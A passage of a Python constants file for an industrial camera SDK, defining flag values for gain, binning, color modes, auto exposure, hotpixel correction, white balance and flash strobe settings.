IS_GET_DEFAULT_BLUE = 0x8007
IS_GET_GAINBOOST = 0x8008
IS_SET_GAINBOOST_ON = 0x0001
IS_SET_GAINBOOST_OFF = 0x0000
IS_GET_SUPPORTED_GAINBOOST = 0x0002
IS_MIN_GAIN = 0
IS_MAX_GAIN = 100
# ----------------------------------------------------------------------------
# Gain factor definitions
# ----------------------------------------------------------------------------
IS_GET_MASTER_GAIN_FACTOR = 0x8000
IS_GET_RED_GAIN_FACTOR = 0x8001
IS_GET_GREEN_GAIN_FACTOR = 0x8002
IS_GET_BLUE_GAIN_FACTOR = 0x8003
IS_SET_MASTER_GAIN_FACTOR = 0x8004
IS_SET_RED_GAIN_FACTOR = 0x8005
IS_SET_GREEN_GAIN_FACTOR = 0x8006
IS_SET_BLUE_GAIN_FACTOR = 0x8007
IS_GET_DEFAULT_MASTER_GAIN_FACTOR = 0x8008
IS_GET_DEFAULT_RED_GAIN_FACTOR = 0x8009
IS_GET_DEFAULT_GREEN_GAIN_FACTOR = 0x800a
IS_GET_DEFAULT_BLUE_GAIN_FACTOR = 0x800b
IS_INQUIRE_MASTER_GAIN_FACTOR = 0x800c
IS_INQUIRE_RED_GAIN_FACTOR = 0x800d
IS_INQUIRE_GREEN_GAIN_FACTOR = 0x800e
IS_INQUIRE_BLUE_GAIN_FACTOR = 0x800f
# ----------------------------------------------------------------------------
# Global Shutter definitions
# ----------------------------------------------------------------------------
IS_SET_GLOBAL_SHUTTER_ON = 0x0001
IS_SET_GLOBAL_SHUTTER_OFF = 0x0000
IS_GET_GLOBAL_SHUTTER = 0x0010
IS_GET_SUPPORTED_GLOBAL_SHUTTER = 0x0020
# ----------------------------------------------------------------------------
# Black level definitions
# ----------------------------------------------------------------------------
IS_GET_BL_COMPENSATION = 0x8000
IS_GET_BL_OFFSET = 0x8001
IS_GET_BL_DEFAULT_MODE = 0x8002
IS_GET_BL_DEFAULT_OFFSET = 0x8003
IS_GET_BL_SUPPORTED_MODE = 0x8004
IS_BL_COMPENSATION_DISABLE = 0
IS_BL_COMPENSATION_ENABLE = 1
IS_BL_COMPENSATION_OFFSET = 32
IS_MIN_BL_OFFSET = 0
IS_MAX_BL_OFFSET = 255
# ----------------------------------------------------------------------------
# hardware gamma definitions
# ----------------------------------------------------------------------------
IS_GET_HW_GAMMA = 0x8000
IS_GET_HW_SUPPORTED_GAMMA = 0x8001
IS_SET_HW_GAMMA_OFF = 0x0000
IS_SET_HW_GAMMA_ON = 0x0001
# ----------------------------------------------------------------------------
# camera LUT
# ----------------------------------------------------------------------------
IS_ENABLE_CAMERA_LUT = 0x0001
IS_SET_CAMERA_LUT_VALUES = 0x0002
IS_ENABLE_RGB_GRAYSCALE = 0x0004
IS_GET_CAMERA_LUT_USER = 0x0008
IS_GET_CAMERA_LUT_COMPLETE = 0x0010
IS_GET_CAMERA_LUT_SUPPORTED_CHANNELS = 0x0020
# ----------------------------------------------------------------------------
# camera LUT presets
# ----------------------------------------------------------------------------
IS_CAMERA_LUT_IDENTITY = 0x00000100
IS_CAMERA_LUT_NEGATIV = 0x00000200
IS_CAMERA_LUT_GLOW1 = 0x00000400
IS_CAMERA_LUT_GLOW2 = 0x00000800
IS_CAMERA_LUT_ASTRO1 = 0x00001000
IS_CAMERA_LUT_RAINBOW1 = 0x00002000
IS_CAMERA_LUT_MAP1 = 0x00004000
IS_CAMERA_LUT_COLD_HOT = 0x00008000
IS_CAMERA_LUT_SEPIC = 0x00010000
IS_CAMERA_LUT_ONLY_RED = 0x00020000
IS_CAMERA_LUT_ONLY_GREEN = 0x00040000
IS_CAMERA_LUT_ONLY_BLUE = 0x00080000
IS_CAMERA_LUT_64 = 64
IS_CAMERA_LUT_128 = 128
# ----------------------------------------------------------------------------
# image parameters
# ----------------------------------------------------------------------------
# brightness
IS_GET_BRIGHTNESS = 0x8000
IS_MIN_BRIGHTNESS = 0
IS_MAX_BRIGHTNESS = 255
IS_DEFAULT_BRIGHTNESS = -1
# contrast
IS_GET_CONTRAST = 0x8000
IS_MIN_CONTRAST = 0
IS_MAX_CONTRAST = 511
IS_DEFAULT_CONTRAST = -1
# gamma
IS_GET_GAMMA = 0x8000
IS_MIN_GAMMA = 1
IS_MAX_GAMMA = 1000
IS_DEFAULT_GAMMA = -1
# saturation (Falcon)
IS_GET_SATURATION_U = 0x8000
IS_MIN_SATURATION_U = 0
IS_MAX_SATURATION_U = 200
IS_DEFAULT_SATURATION_U = 100
IS_GET_SATURATION_V = 0x8001
IS_MIN_SATURATION_V = 0
IS_MAX_SATURATION_V = 200
IS_DEFAULT_SATURATION_V = 100
# hue (Falcon)
IS_GET_HUE = 0x8000
IS_MIN_HUE = 0
IS_MAX_HUE = 255
IS_DEFAULT_HUE = 128
# ----------------------------------------------------------------------------
# Image position and size
# ----------------------------------------------------------------------------
# deprecated defines
IS_GET_IMAGE_SIZE_X = 0x8000
IS_GET_IMAGE_SIZE_Y = 0x8001
IS_GET_IMAGE_SIZE_X_INC = 0x8002
IS_GET_IMAGE_SIZE_Y_INC = 0x8003
IS_GET_IMAGE_SIZE_X_MIN = 0x8004
IS_GET_IMAGE_SIZE_Y_MIN = 0x8005
IS_GET_IMAGE_SIZE_X_MAX = 0x8006
IS_GET_IMAGE_SIZE_Y_MAX = 0x8007
IS_GET_IMAGE_POS_X = 0x8001
IS_GET_IMAGE_POS_Y = 0x8002
IS_GET_IMAGE_POS_X_ABS = 0xC001
IS_GET_IMAGE_POS_Y_ABS = 0xC002
IS_GET_IMAGE_POS_X_INC = 0xC003
IS_GET_IMAGE_POS_Y_INC = 0xC004
IS_GET_IMAGE_POS_X_MIN = 0xC005
IS_GET_IMAGE_POS_Y_MIN = 0xC006
IS_GET_IMAGE_POS_X_MAX = 0xC007
IS_GET_IMAGE_POS_Y_MAX = 0xC008
IS_SET_IMAGE_POS_X_ABS = 0x00010000
IS_SET_IMAGE_POS_Y_ABS = 0x00010000
IS_SET_IMAGEPOS_X_ABS = 0x8000
IS_SET_IMAGEPOS_Y_ABS = 0x8000
# Valid defines
# Image
IS_AOI_IMAGE_SET_AOI = 0x0001
IS_AOI_IMAGE_GET_AOI = 0x0002
IS_AOI_IMAGE_SET_POS = 0x0003
IS_AOI_IMAGE_GET_POS = 0x0004
IS_AOI_IMAGE_SET_SIZE = 0x0005
IS_AOI_IMAGE_GET_SIZE = 0x0006
IS_AOI_IMAGE_GET_POS_MIN = 0x0007
IS_AOI_IMAGE_GET_SIZE_MIN = 0x0008
IS_AOI_IMAGE_GET_POS_MAX = 0x0009
IS_AOI_IMAGE_GET_SIZE_MAX = 0x0010
IS_AOI_IMAGE_GET_POS_INC = 0x0011
IS_AOI_IMAGE_GET_SIZE_INC = 0x0012
IS_AOI_IMAGE_GET_POS_X_ABS = 0x0013
IS_AOI_IMAGE_GET_POS_Y_ABS = 0x0014
IS_AOI_IMAGE_GET_ORIGINAL_AOI = 0x0015
IS_AOI_IMAGE_POS_ABSOLUTE = 0x10000000
# Fast move
IS_AOI_IMAGE_SET_POS_FAST = 0x0020
IS_AOI_IMAGE_SET_POS_FAST_SUPPORTED = 0x0021
# Auto features
IS_AOI_AUTO_BRIGHTNESS_SET_AOI = 0x0030
IS_AOI_AUTO_BRIGHTNESS_GET_AOI = 0x0031
IS_AOI_AUTO_WHITEBALANCE_SET_AOI = 0x0032
IS_AOI_AUTO_WHITEBALANCE_GET_AOI = 0x0033
# Multi AOI
IS_AOI_MULTI_GET_SUPPORTED_MODES = 0x0100
IS_AOI_MULTI_SET_AOI = 0x0200
IS_AOI_MULTI_GET_AOI = 0x0400
IS_AOI_MULTI_DISABLE_AOI = 0x0800
IS_AOI_MULTI_MODE_AXES = 0x0001
IS_AOI_MULTI_MODE_X_Y_AXES = 0x0001
IS_AOI_MULTI_MODE_Y_AXES = 0x0002
# AOI sequence
IS_AOI_SEQUENCE_GET_SUPPORTED = 0x0050
IS_AOI_SEQUENCE_SET_PARAMS = 0x0051
IS_AOI_SEQUENCE_GET_PARAMS = 0x0052
IS_AOI_SEQUENCE_SET_ENABLE = 0x0053
IS_AOI_SEQUENCE_GET_ENABLE = 0x0054
IS_AOI_SEQUENCE_INDEX_AOI_1 = 0
IS_AOI_SEQUENCE_INDEX_AOI_2 = 1
IS_AOI_SEQUENCE_INDEX_AOI_3 = 2
IS_AOI_SEQUENCE_INDEX_AOI_4 = 4
# ----------------------------------------------------------------------------
# ROP effect constants
# ----------------------------------------------------------------------------
IS_GET_ROP_EFFECT = 0x8000
IS_GET_SUPPORTED_ROP_EFFECT = 0x8001
IS_SET_ROP_NONE = 0
IS_SET_ROP_MIRROR_UPDOWN = 8
IS_SET_ROP_MIRROR_UPDOWN_ODD = 16
IS_SET_ROP_MIRROR_UPDOWN_EVEN = 32
IS_SET_ROP_MIRROR_LEFTRIGHT = 64
# ----------------------------------------------------------------------------
# Subsampling
# ----------------------------------------------------------------------------
IS_GET_SUBSAMPLING = 0x8000
IS_GET_SUPPORTED_SUBSAMPLING = 0x8001
IS_GET_SUBSAMPLING_TYPE = 0x8002
IS_GET_SUBSAMPLING_FACTOR_HORIZONTAL = 0x8004
IS_GET_SUBSAMPLING_FACTOR_VERTICAL = 0x8008
IS_SUBSAMPLING_DISABLE = 0x00
IS_SUBSAMPLING_2X_VERTICAL = 0x0001
IS_SUBSAMPLING_2X_HORIZONTAL = 0x0002
IS_SUBSAMPLING_4X_VERTICAL = 0x0004
IS_SUBSAMPLING_4X_HORIZONTAL = 0x0008
IS_SUBSAMPLING_3X_VERTICAL = 0x0010
IS_SUBSAMPLING_3X_HORIZONTAL = 0x0020
IS_SUBSAMPLING_5X_VERTICAL = 0x0040
IS_SUBSAMPLING_5X_HORIZONTAL = 0x0080
IS_SUBSAMPLING_6X_VERTICAL = 0x0100
IS_SUBSAMPLING_6X_HORIZONTAL = 0x0200
IS_SUBSAMPLING_8X_VERTICAL = 0x0400
IS_SUBSAMPLING_8X_HORIZONTAL = 0x0800
IS_SUBSAMPLING_16X_VERTICAL = 0x1000
IS_SUBSAMPLING_16X_HORIZONTAL = 0x2000
IS_SUBSAMPLING_COLOR = 0x01
IS_SUBSAMPLING_MONO = 0x02
IS_SUBSAMPLING_MASK_VERTICAL = (IS_SUBSAMPLING_2X_VERTICAL | IS_SUBSAMPLING_4X_VERTICAL | IS_SUBSAMPLING_3X_VERTICAL | IS_SUBSAMPLING_5X_VERTICAL | IS_SUBSAMPLING_6X_VERTICAL | IS_SUBSAMPLING_8X_VERTICAL | IS_SUBSAMPLING_16X_VERTICAL)
IS_SUBSAMPLING_MASK_HORIZONTAL = (IS_SUBSAMPLING_2X_HORIZONTAL | IS_SUBSAMPLING_4X_HORIZONTAL | IS_SUBSAMPLING_3X_HORIZONTAL | IS_SUBSAMPLING_5X_HORIZONTAL | IS_SUBSAMPLING_6X_HORIZONTAL | IS_SUBSAMPLING_8X_HORIZONTAL | IS_SUBSAMPLING_16X_HORIZONTAL)
# Compatibility
IS_SUBSAMPLING_VERT = IS_SUBSAMPLING_2X_VERTICAL
IS_SUBSAMPLING_HOR = IS_SUBSAMPLING_2X_HORIZONTAL
# ----------------------------------------------------------------------------
# Binning
# ----------------------------------------------------------------------------
IS_GET_BINNING = 0x8000
IS_GET_SUPPORTED_BINNING = 0x8001
IS_GET_BINNING_TYPE = 0x8002
IS_GET_BINNING_FACTOR_HORIZONTAL= 0x8004
IS_GET_BINNING_FACTOR_VERTICAL = 0x8008
IS_BINNING_DISABLE = 0x00
IS_BINNING_2X_VERTICAL = 0x0001
IS_BINNING_2X_HORIZONTAL = 0x0002
IS_BINNING_4X_VERTICAL = 0x0004
IS_BINNING_4X_HORIZONTAL = 0x0008
IS_BINNING_3X_VERTICAL = 0x0010
IS_BINNING_3X_HORIZONTAL = 0x0020
IS_BINNING_5X_VERTICAL = 0x0040
IS_BINNING_5X_HORIZONTAL = 0x0080
IS_BINNING_6X_VERTICAL = 0x0100
IS_BINNING_6X_HORIZONTAL = 0x0200
IS_BINNING_8X_VERTICAL = 0x0400
IS_BINNING_8X_HORIZONTAL = 0x0800
IS_BINNING_16X_VERTICAL = 0x1000
IS_BINNING_16X_HORIZONTAL = 0x2000
IS_BINNING_COLOR = 0x01
IS_BINNING_MONO = 0x02
IS_BINNING_MASK_VERTICAL = (IS_BINNING_2X_VERTICAL | IS_BINNING_3X_VERTICAL | IS_BINNING_4X_VERTICAL | IS_BINNING_5X_VERTICAL | IS_BINNING_6X_VERTICAL | IS_BINNING_8X_VERTICAL | IS_BINNING_16X_VERTICAL)
IS_BINNING_MASK_HORIZONTAL = (IS_BINNING_2X_HORIZONTAL | IS_BINNING_3X_HORIZONTAL | IS_BINNING_4X_HORIZONTAL | IS_BINNING_5X_HORIZONTAL | IS_BINNING_6X_HORIZONTAL | IS_BINNING_8X_HORIZONTAL | IS_BINNING_16X_HORIZONTAL)
# Compatibility
IS_BINNING_VERT = IS_BINNING_2X_VERTICAL
IS_BINNING_HOR = IS_BINNING_2X_HORIZONTAL
# ----------------------------------------------------------------------------
# Auto Control Parameter
# ----------------------------------------------------------------------------
IS_SET_ENABLE_AUTO_GAIN = 0x8800
IS_GET_ENABLE_AUTO_GAIN = 0x8801
IS_SET_ENABLE_AUTO_SHUTTER = 0x8802
IS_GET_ENABLE_AUTO_SHUTTER = 0x8803
IS_SET_ENABLE_AUTO_WHITEBALANCE = 0x8804
IS_GET_ENABLE_AUTO_WHITEBALANCE = 0x8805
IS_SET_ENABLE_AUTO_FRAMERATE = 0x8806
IS_GET_ENABLE_AUTO_FRAMERATE = 0x8807
IS_SET_ENABLE_AUTO_SENSOR_GAIN = 0x8808
IS_GET_ENABLE_AUTO_SENSOR_GAIN = 0x8809
IS_SET_ENABLE_AUTO_SENSOR_SHUTTER = 0x8810
IS_GET_ENABLE_AUTO_SENSOR_SHUTTER = 0x8811
IS_SET_ENABLE_AUTO_SENSOR_GAIN_SHUTTER = 0x8812
IS_GET_ENABLE_AUTO_SENSOR_GAIN_SHUTTER = 0x8813
IS_SET_ENABLE_AUTO_SENSOR_FRAMERATE = 0x8814
IS_GET_ENABLE_AUTO_SENSOR_FRAMERATE = 0x8815
IS_SET_ENABLE_AUTO_SENSOR_WHITEBALANCE = 0x8816
IS_GET_ENABLE_AUTO_SENSOR_WHITEBALANCE = 0x8817
IS_SET_AUTO_REFERENCE = 0x8000
IS_GET_AUTO_REFERENCE = 0x8001
IS_SET_AUTO_GAIN_MAX = 0x8002
IS_GET_AUTO_GAIN_MAX = 0x8003
IS_SET_AUTO_SHUTTER_MAX = 0x8004
IS_GET_AUTO_SHUTTER_MAX = 0x8005
IS_SET_AUTO_SPEED = 0x8006
IS_GET_AUTO_SPEED = 0x8007
IS_SET_AUTO_WB_OFFSET = 0x8008
IS_GET_AUTO_WB_OFFSET = 0x8009
IS_SET_AUTO_WB_GAIN_RANGE = 0x800A
IS_GET_AUTO_WB_GAIN_RANGE = 0x800B
IS_SET_AUTO_WB_SPEED = 0x800C
IS_GET_AUTO_WB_SPEED = 0x800D
IS_SET_AUTO_WB_ONCE = 0x800E
IS_GET_AUTO_WB_ONCE = 0x800F
IS_SET_AUTO_BRIGHTNESS_ONCE = 0x8010
IS_GET_AUTO_BRIGHTNESS_ONCE = 0x8011
IS_SET_AUTO_HYSTERESIS = 0x8012
IS_GET_AUTO_HYSTERESIS = 0x8013
IS_GET_AUTO_HYSTERESIS_RANGE = 0x8014
IS_SET_AUTO_WB_HYSTERESIS = 0x8015
IS_GET_AUTO_WB_HYSTERESIS = 0x8016
IS_GET_AUTO_WB_HYSTERESIS_RANGE = 0x8017
IS_SET_AUTO_SKIPFRAMES = 0x8018
IS_GET_AUTO_SKIPFRAMES = 0x8019
IS_GET_AUTO_SKIPFRAMES_RANGE = 0x801A
IS_SET_AUTO_WB_SKIPFRAMES = 0x801B
IS_GET_AUTO_WB_SKIPFRAMES = 0x801C
IS_GET_AUTO_WB_SKIPFRAMES_RANGE = 0x801D
IS_SET_SENS_AUTO_SHUTTER_PHOTOM = 0x801E
IS_SET_SENS_AUTO_GAIN_PHOTOM = 0x801F
IS_GET_SENS_AUTO_SHUTTER_PHOTOM = 0x8020
IS_GET_SENS_AUTO_GAIN_PHOTOM = 0x8021
IS_GET_SENS_AUTO_SHUTTER_PHOTOM_DEF = 0x8022
IS_GET_SENS_AUTO_GAIN_PHOTOM_DEF = 0x8023
IS_SET_SENS_AUTO_CONTRAST_CORRECTION = 0x8024
IS_GET_SENS_AUTO_CONTRAST_CORRECTION = 0x8025
IS_GET_SENS_AUTO_CONTRAST_CORRECTION_RANGE = 0x8026
IS_GET_SENS_AUTO_CONTRAST_CORRECTION_INC = 0x8027
IS_GET_SENS_AUTO_CONTRAST_CORRECTION_DEF = 0x8028
IS_SET_SENS_AUTO_CONTRAST_FDT_AOI_ENABLE = 0x8029
IS_GET_SENS_AUTO_CONTRAST_FDT_AOI_ENABLE = 0x8030
IS_SET_SENS_AUTO_BACKLIGHT_COMP = 0x8031
IS_GET_SENS_AUTO_BACKLIGHT_COMP = 0x8032
IS_GET_SENS_AUTO_BACKLIGHT_COMP_RANGE = 0x8033
IS_GET_SENS_AUTO_BACKLIGHT_COMP_INC = 0x8034
IS_GET_SENS_AUTO_BACKLIGHT_COMP_DEF = 0x8035
IS_SET_ANTI_FLICKER_MODE = 0x8036
IS_GET_ANTI_FLICKER_MODE = 0x8037
IS_GET_ANTI_FLICKER_MODE_DEF = 0x8038
# ----------------------------------------------------------------------------
# Auto Control definitions
# ----------------------------------------------------------------------------
IS_MIN_AUTO_BRIGHT_REFERENCE = 0
IS_MAX_AUTO_BRIGHT_REFERENCE = 255
IS_DEFAULT_AUTO_BRIGHT_REFERENCE = 128
IS_MIN_AUTO_SPEED = 0
IS_MAX_AUTO_SPEED = 100
IS_DEFAULT_AUTO_SPEED = 50
IS_DEFAULT_AUTO_WB_OFFSET = 0
IS_MIN_AUTO_WB_OFFSET = -50
IS_MAX_AUTO_WB_OFFSET = 50
IS_DEFAULT_AUTO_WB_SPEED = 50
IS_MIN_AUTO_WB_SPEED = 0
IS_MAX_AUTO_WB_SPEED = 100
IS_MIN_AUTO_WB_REFERENCE = 0
IS_MAX_AUTO_WB_REFERENCE = 255
# ----------------------------------------------------------------------------
# AOI types to set/get
# ----------------------------------------------------------------------------
IS_SET_AUTO_BRIGHT_AOI = 0x8000
IS_GET_AUTO_BRIGHT_AOI = 0x8001
IS_SET_IMAGE_AOI = 0x8002
IS_GET_IMAGE_AOI = 0x8003
IS_SET_AUTO_WB_AOI = 0x8004
IS_GET_AUTO_WB_AOI = 0x8005
# ----------------------------------------------------------------------------
# color modes
# ----------------------------------------------------------------------------
IS_GET_COLOR_MODE = 0x8000
IS_SET_CM_RGB32 = 0
IS_SET_CM_RGB24 = 1
IS_SET_CM_RGB16 = 2
IS_SET_CM_RGB15 = 3
IS_SET_CM_Y8 = 6
IS_SET_CM_RGB8 = 7
IS_SET_CM_BAYER = 11
IS_SET_CM_UYVY = 12
IS_SET_CM_UYVY_MONO = 13
IS_SET_CM_UYVY_BAYER = 14
IS_SET_CM_CBYCRY = 23
IS_SET_CM_RGBY = 24
IS_SET_CM_RGB30 = 25
IS_SET_CM_Y12 = 26
IS_SET_CM_BAYER12 = 27
IS_SET_CM_Y16 = 28
IS_SET_CM_BAYER16 = 29
IS_CM_MODE_MASK = 0x007F
# planar vs packed format
IS_CM_FORMAT_PACKED = 0x0000
IS_CM_FORMAT_PLANAR = 0x2000
IS_CM_FORMAT_MASK = 0x2000
# BGR vs. RGB order
IS_CM_ORDER_BGR = 0x0000
IS_CM_ORDER_RGB = 0x0080
IS_CM_ORDER_MASK = 0x0080
# define compliant color format names
IS_CM_MONO8 = IS_SET_CM_Y8 # occupies 8 Bit
IS_CM_MONO12 = IS_SET_CM_Y12 # occupies 16 Bit
IS_CM_MONO16 = IS_SET_CM_Y16 # occupies 16 Bit
IS_CM_BAYER_RG8 = IS_SET_CM_BAYER # occupies 8 Bit
IS_CM_BAYER_RG12 = IS_SET_CM_BAYER12 # occupies 16 Bit
IS_CM_BAYER_RG16 = IS_SET_CM_BAYER16 # occupies 16 Bit
IS_CM_SENSOR_RAW8 = IS_SET_CM_BAYER # occupies 8 Bit
IS_CM_SENSOR_RAW12 = IS_SET_CM_BAYER12 # occupies 16 Bit
IS_CM_SENSOR_RAW16 = IS_SET_CM_BAYER16 # occupies 16 Bit
IS_CM_BGR5_PACKED = (IS_SET_CM_RGB15 | IS_CM_ORDER_BGR | IS_CM_FORMAT_PACKED) # occupies 16 Bit
IS_CM_BGR555_PACKED = (IS_SET_CM_RGB15 | IS_CM_ORDER_BGR | IS_CM_FORMAT_PACKED) # occupies 16 Bit
IS_CM_BGR565_PACKED = (IS_SET_CM_RGB16 | IS_CM_ORDER_BGR | IS_CM_FORMAT_PACKED) # occupies 16 Bit
IS_CM_RGB8_PACKED = (IS_SET_CM_RGB24 | IS_CM_ORDER_RGB | IS_CM_FORMAT_PACKED) # occupies 24 Bit
IS_CM_BGR8_PACKED = (IS_SET_CM_RGB24 | IS_CM_ORDER_BGR | IS_CM_FORMAT_PACKED) # occupies 24 Bit
IS_CM_RGBA8_PACKED = (IS_SET_CM_RGB32 | IS_CM_ORDER_RGB | IS_CM_FORMAT_PACKED) # occupies 32 Bit
IS_CM_BGRA8_PACKED = (IS_SET_CM_RGB32 | IS_CM_ORDER_BGR | IS_CM_FORMAT_PACKED) # occupies 32 Bit
IS_CM_RGBY8_PACKED = (IS_SET_CM_RGBY | IS_CM_ORDER_RGB | IS_CM_FORMAT_PACKED) # occupies 32 Bit
IS_CM_BGRY8_PACKED = (IS_SET_CM_RGBY | IS_CM_ORDER_BGR | IS_CM_FORMAT_PACKED) # occupies 32 Bit
IS_CM_RGB10V2_PACKED = (IS_SET_CM_RGB30 | IS_CM_ORDER_RGB | IS_CM_FORMAT_PACKED) # occupies 32 Bit
IS_CM_BGR10V2_PACKED = (IS_SET_CM_RGB30 | IS_CM_ORDER_BGR | IS_CM_FORMAT_PACKED) # occupies 32 Bit
IS_CM_RGB10_PACKED = (25 | IS_CM_ORDER_RGB | IS_CM_FORMAT_PACKED)
IS_CM_BGR10_PACKED = (25 | IS_CM_ORDER_BGR | IS_CM_FORMAT_PACKED)
IS_CM_RGB12_PACKED = (30 | IS_CM_ORDER_RGB | IS_CM_FORMAT_PACKED) # occupies 48 Bit
IS_CM_BGR12_PACKED = (30 | IS_CM_ORDER_BGR | IS_CM_FORMAT_PACKED) # occupies 48 Bit
IS_CM_RGBA12_PACKED = (31 | IS_CM_ORDER_RGB | IS_CM_FORMAT_PACKED) # occupies 64 Bit
IS_CM_BGRA12_PACKED = (31 | IS_CM_ORDER_BGR | IS_CM_FORMAT_PACKED) # occupies 64 Bit
IS_CM_YUV422_PACKED = 1 # no compliant version
IS_CM_UYVY_PACKED = (IS_SET_CM_UYVY | IS_CM_FORMAT_PACKED) # occupies 16 Bit
IS_CM_UYVY_MONO_PACKED = (IS_SET_CM_UYVY_MONO | IS_CM_FORMAT_PACKED)
IS_CM_UYVY_BAYER_PACKED= (IS_SET_CM_UYVY_BAYER | IS_CM_FORMAT_PACKED)
IS_CM_CBYCRY_PACKED = (IS_SET_CM_CBYCRY | IS_CM_FORMAT_PACKED) # occupies 16 Bit
IS_CM_RGB8_PLANAR = (1 | IS_CM_ORDER_RGB | IS_CM_FORMAT_PLANAR)
IS_CM_RGB12_PLANAR = 1 # no compliant version
IS_CM_RGB16_PLANAR = 1 # no compliant version
IS_CM_ALL_POSSIBLE = 0xFFFF
IS_CM_MODE_MASK = 0x007F
# ----------------------------------------------------------------------------
# Hotpixel correction
# ----------------------------------------------------------------------------
# Deprecated defines
IS_GET_BPC_MODE = 0x8000
IS_GET_BPC_THRESHOLD = 0x8001
IS_GET_BPC_SUPPORTED_MODE = 0x8002
IS_BPC_DISABLE = 0
IS_BPC_ENABLE_LEVEL_1 = 1
IS_BPC_ENABLE_LEVEL_2 = 2
IS_BPC_ENABLE_USER = 4
IS_BPC_ENABLE_SOFTWARE = IS_BPC_ENABLE_LEVEL_2
IS_BPC_ENABLE_HARDWARE = IS_BPC_ENABLE_LEVEL_1
IS_SET_BADPIXEL_LIST = 0x01
IS_GET_BADPIXEL_LIST = 0x02
IS_GET_LIST_SIZE = 0x03
# Valid defines
IS_HOTPIXEL_DISABLE_CORRECTION = 0x0000
IS_HOTPIXEL_ENABLE_SENSOR_CORRECTION = 0x0001
IS_HOTPIXEL_ENABLE_CAMERA_CORRECTION = 0x0002
IS_HOTPIXEL_ENABLE_SOFTWARE_USER_CORRECTION = 0x0004
IS_HOTPIXEL_GET_CORRECTION_MODE = 0x8000
IS_HOTPIXEL_GET_SUPPORTED_CORRECTION_MODES = 0x8001
IS_HOTPIXEL_GET_SOFTWARE_USER_LIST_EXISTS = 0x8100
IS_HOTPIXEL_GET_SOFTWARE_USER_LIST_NUMBER = 0x8101
IS_HOTPIXEL_GET_SOFTWARE_USER_LIST = 0x8102
IS_HOTPIXEL_SET_SOFTWARE_USER_LIST = 0x8103
IS_HOTPIXEL_SAVE_SOFTWARE_USER_LIST = 0x8104
IS_HOTPIXEL_LOAD_SOFTWARE_USER_LIST = 0x8105
IS_HOTPIXEL_GET_CAMERA_FACTORY_LIST_EXISTS = 0x8106
IS_HOTPIXEL_GET_CAMERA_FACTORY_LIST_NUMBER = 0x8107
IS_HOTPIXEL_GET_CAMERA_FACTORY_LIST = 0x8108
IS_HOTPIXEL_GET_CAMERA_USER_LIST_EXISTS = 0x8109
IS_HOTPIXEL_GET_CAMERA_USER_LIST_NUMBER = 0x810A
IS_HOTPIXEL_GET_CAMERA_USER_LIST = 0x810B
IS_HOTPIXEL_SET_CAMERA_USER_LIST = 0x810C
IS_HOTPIXEL_GET_CAMERA_USER_LIST_MAX_NUMBER = 0x810D
IS_HOTPIXEL_DELETE_CAMERA_USER_LIST = 0x810E
IS_HOTPIXEL_GET_MERGED_CAMERA_LIST_NUMBER = 0x810F
IS_HOTPIXEL_GET_MERGED_CAMERA_LIST = 0x8110
IS_HOTPIXEL_SAVE_SOFTWARE_USER_LIST_UNICODE = 0x8111
IS_HOTPIXEL_LOAD_SOFTWARE_USER_LIST_UNICODE = 0x8112
# ----------------------------------------------------------------------------
# color correction definitions
# ----------------------------------------------------------------------------
IS_GET_CCOR_MODE = 0x8000
IS_GET_SUPPORTED_CCOR_MODE = 0x8001
IS_GET_DEFAULT_CCOR_MODE = 0x8002
IS_GET_CCOR_FACTOR = 0x8003
IS_GET_CCOR_FACTOR_MIN = 0x8004
IS_GET_CCOR_FACTOR_MAX = 0x8005
IS_GET_CCOR_FACTOR_DEFAULT = 0x8006
IS_CCOR_DISABLE = 0x0000
IS_CCOR_ENABLE = 0x0001
IS_CCOR_ENABLE_NORMAL = IS_CCOR_ENABLE
IS_CCOR_ENABLE_BG40_ENHANCED = 0x0002
IS_CCOR_ENABLE_HQ_ENHANCED = 0x0004
IS_CCOR_SET_IR_AUTOMATIC = 0x0080
IS_CCOR_FACTOR = 0x0100
IS_CCOR_ENABLE_MASK = (IS_CCOR_ENABLE_NORMAL | IS_CCOR_ENABLE_BG40_ENHANCED | IS_CCOR_ENABLE_HQ_ENHANCED)
# ----------------------------------------------------------------------------
# bayer algorithm modes
# ----------------------------------------------------------------------------
IS_GET_BAYER_CV_MODE = 0x8000
IS_SET_BAYER_CV_NORMAL = 0x0000
IS_SET_BAYER_CV_BETTER = 0x0001
IS_SET_BAYER_CV_BEST = 0x0002
# ----------------------------------------------------------------------------
# color converter modes
# ----------------------------------------------------------------------------
IS_CONV_MODE_NONE = 0x0000
IS_CONV_MODE_SOFTWARE = 0x0001
IS_CONV_MODE_SOFTWARE_3X3 = 0x0002
IS_CONV_MODE_SOFTWARE_5X5 = 0x0004
IS_CONV_MODE_HARDWARE_3X3 = 0x0008
IS_CONV_MODE_OPENCL_3X3 = 0x0020
IS_CONV_MODE_OPENCL_5X5 = 0x0040
# ----------------------------------------------------------------------------
# Edge enhancement
# ----------------------------------------------------------------------------
IS_GET_EDGE_ENHANCEMENT = 0x8000
IS_EDGE_EN_DISABLE = 0
IS_EDGE_EN_STRONG = 1
IS_EDGE_EN_WEAK = 2
# ----------------------------------------------------------------------------
# white balance modes
# ----------------------------------------------------------------------------
IS_GET_WB_MODE = 0x8000
IS_SET_WB_DISABLE = 0x0000
IS_SET_WB_USER = 0x0001
IS_SET_WB_AUTO_ENABLE = 0x0002
IS_SET_WB_AUTO_ENABLE_ONCE = 0x0004
IS_SET_WB_DAYLIGHT_65 = 0x0101
IS_SET_WB_COOL_WHITE = 0x0102
IS_SET_WB_U30 = 0x0103
IS_SET_WB_ILLUMINANT_A = 0x0104
IS_SET_WB_HORIZON = 0x0105
# ----------------------------------------------------------------------------
# flash strobe constants
# ----------------------------------------------------------------------------
IS_GET_FLASHSTROBE_MODE = 0x8000
IS_GET_FLASHSTROBE_LINE = 0x8001
IS_GET_SUPPORTED_FLASH_IO_PORTS = 0x8002
IS_SET_FLASH_OFF = 0
IS_SET_FLASH_ON = 1
IS_SET_FLASH_LO_ACTIVE = IS_SET_FLASH_ON
IS_SET_FLASH_HI_ACTIVE = 2
IS_SET_FLASH_HIGH = 3
IS_SET_FLASH_LOW = 4
IS_SET_FLASH_LO_ACTIVE_FREERUN = 5
IS_SET_FLASH_HI_ACTIVE_FREERUN = 6
IS_SET_FLASH_IO_1 = 0x0010
IS_SET_FLASH_IO_2 = 0x0020
IS_SET_FLASH_IO_3 = 0x0040
IS_SET_FLASH_IO_4 = 0x0080
IS_FLASH_IO_PORT_MASK = (IS_SET_FLASH_IO_1 | IS_SET_FLASH_IO_2 | IS_SET_FLASH_IO_3 | IS_SET_FLASH_IO_4)
